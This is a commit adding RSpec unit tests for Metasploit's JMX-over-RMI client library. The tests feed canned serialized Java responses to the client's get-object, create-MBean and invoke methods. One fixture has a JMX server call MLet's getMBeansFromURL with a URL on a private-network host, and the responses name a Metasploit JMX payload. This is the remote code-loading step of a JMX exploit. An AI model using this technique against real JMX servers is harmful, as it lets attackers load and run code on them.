Add specs for Msf::Java::Rmi::Client::Jmx::Connection

jvazquez-r7 · jvazquez-r7 · commit 0b671d52106d · 2015-03-24T19:15:25.000-05:00
diff --git a/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb b/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
@@ -0,0 +1,157 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/java/serialization'
+require 'rex/proto/rmi'
+require 'msf/java/rmi/client'
+require 'stringio'
+
+describe Msf::Java::Rmi::Client::Jmx::Connection do
+
+  let(:name_get) { 'DefaultDomain:type=MLet' }
+
+  let(:get_object_instance_response) do
+    "\x51\xac\xed\x00\x05\x77\x0f\x01\x1e\xc8\x7c\x01\x00\x00\x01\x4c" +
+    "\x4e\x3d\x1c\x2f\x80\x08\x73\x72\x00\x1f\x6a\x61\x76\x61\x78\x2e" +
+    "\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63" +
+    "\x74\x49\x6e\x73\x74\x61\x6e\x63\x65\xc7\x1a\x0a\xcf\xad\x28\x7b" +
+    "\x76\x02\x00\x02\x4c\x00\x09\x63\x6c\x61\x73\x73\x4e\x61\x6d\x65" +
+    "\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" +
+    "\x72\x69\x6e\x67\x3b\x4c\x00\x04\x6e\x61\x6d\x65\x74\x00\x1d\x4c" +
+    "\x6a\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74" +
+    "\x2f\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x70\x78\x70\x74" +
+    "\x00\x1d\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65" +
+    "\x6e\x74\x2e\x6c\x6f\x61\x64\x69\x6e\x67\x2e\x4d\x4c\x65\x74\x73" +
+    "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d" +
+    "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03" +
+    "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x70\x78\x70\x74\x00\x17\x44" +
+    "\x65\x66\x61\x75\x6c\x74\x44\x6f\x6d\x61\x69\x6e\x3a\x74\x79\x70" +
+    "\x65\x3d\x4d\x4c\x65\x74\x78"
+  end
+
+  let(:name_create) { 'javax.management.loading.MLet' }
+
+  let(:create_mbean_response) do
+    "\x51\xac\xed\x00\x05\x77\x0f\x01\x1e\xc8\x7c\x01\x00\x00\x01\x4c" +
+    "\x4e\x3d\x1c\x2f\x80\x07\x73\x72\x00\x1f\x6a\x61\x76\x61\x78\x2e" +
+    "\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63" +
+    "\x74\x49\x6e\x73\x74\x61\x6e\x63\x65\xc7\x1a\x0a\xcf\xad\x28\x7b" +
+    "\x76\x02\x00\x02\x4c\x00\x09\x63\x6c\x61\x73\x73\x4e\x61\x6d\x65" +
+    "\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" +
+    "\x72\x69\x6e\x67\x3b\x4c\x00\x04\x6e\x61\x6d\x65\x74\x00\x1d\x4c" +
+    "\x6a\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74" +
+    "\x2f\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x70\x78\x70\x74" +
+    "\x00\x1d\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65" +
+    "\x6e\x74\x2e\x6c\x6f\x61\x64\x69\x6e\x67\x2e\x4d\x4c\x65\x74\x73" +
+    "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d" +
+    "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03" +
+    "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x70\x78\x70\x74\x00\x17\x44" +
+    "\x65\x66\x61\x75\x6c\x74\x44\x6f\x6d\x61\x69\x6e\x3a\x74\x79\x70" +
+    "\x65\x3d\x4d\x4c\x65\x74\x78"
+  end
+
+  let(:invoke_args) do
+    {
+      object: 'DefaultDomain:type=MLet',
+      method: 'getMBeansFromURL',
+      args: { 'java.lang.String' => 'http:///http://192.168.0.3:8080/nH8rSZGf5WkYF/mlet' }
+    }
+  end
+
+  let(:invoke_response) do
+    "\x51\xac\xed\x00\x05\x77\x0f\x01\x1e\xc8\x7c\x01\x00\x00\x01\x4c" +
+    "\x4e\x3d\x1c\x2f\x80\x09\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75" +
+    "\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65\x74\xba\x44\x85\x95\x96" +
+    "\xb8\xb7\x34\x03\x00\x00\x70\x78\x70\x77\x0c\x00\x00\x00\x10\x3f" +
+    "\x40\x00\x00\x00\x00\x00\x01\x73\x72\x00\x1f\x6a\x61\x76\x61\x78" +
+    "\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65" +
+    "\x63\x74\x49\x6e\x73\x74\x61\x6e\x63\x65\xc7\x1a\x0a\xcf\xad\x28" +
+    "\x7b\x76\x02\x00\x02\x4c\x00\x09\x63\x6c\x61\x73\x73\x4e\x61\x6d" +
+    "\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53" +
+    "\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x6e\x61\x6d\x65\x74\x00\x1d" +
+    "\x4c\x6a\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e" +
+    "\x74\x2f\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x70\x78\x70" +
+    "\x74\x00\x15\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e\x4a\x4d" +
+    "\x58\x50\x61\x79\x6c\x6f\x61\x64\x73\x72\x00\x1b\x6a\x61\x76\x61" +
+    "\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a" +
+    "\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03" +
+    "\x00\x00\x70\x78\x70\x74\x00\x21\x4d\x4c\x65\x74\x47\x78\x61\x7a" +
+    "\x6f\x6f\x6d\x79\x3a\x6e\x61\x6d\x65\x3d\x6a\x6d\x78\x70\x61\x79" +
+    "\x6c\x6f\x61\x64\x2c\x69\x64\x3d\x31\x78\x78"
+  end
+
+  let(:remote_address) do
+    '172.16.158.132'
+  end
+
+  subject(:mod) do
+    mod = ::Msf::Exploit.new
+    mod.extend ::Msf::Java::Rmi::Client
+    mod.send(:initialize)
+    mod
+  end
+
+  let(:io) { StringIO.new('', 'w+b') }
+
+  describe "#send_jmx_get_object_instance" do
+    context "when the object exists" do
+      before(:each) do
+        allow_any_instance_of(::StringIO).to receive(:put) do |io, data|
+          io.seek(0)
+          io.write(get_object_instance_response)
+          io.seek(0)
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+      end
+
+      it "returns true" do
+        expect(mod.send_jmx_get_object_instance(sock: io, name: name_get)).to be_truthy
+      end
+    end
+  end
+
+  describe "#send_jmx_create_mbean" do
+    context "when the object is created successfully" do
+      before(:each) do
+        allow_any_instance_of(::StringIO).to receive(:put) do |io, data|
+          io.seek(0)
+          io.write(create_mbean_response)
+          io.seek(0)
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+      end
+
+      it "returns true" do
+        expect(mod.send_jmx_create_mbean(sock: io, name: name_create)).to be_truthy
+      end
+    end
+  end
+
+  describe "#send_jmx_invoke" do
+    context "when the remote method is called successfully" do
+      before(:each) do
+        allow_any_instance_of(::StringIO).to receive(:put) do |io, data|
+          io.seek(0)
+          io.write(invoke_response)
+          io.seek(0)
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+      end
+
+      it "returns true" do
+        expect(mod.send_jmx_invoke(invoke_args.merge(sock: io))).to be_truthy
+      end
+    end
+  end
+
+end
+
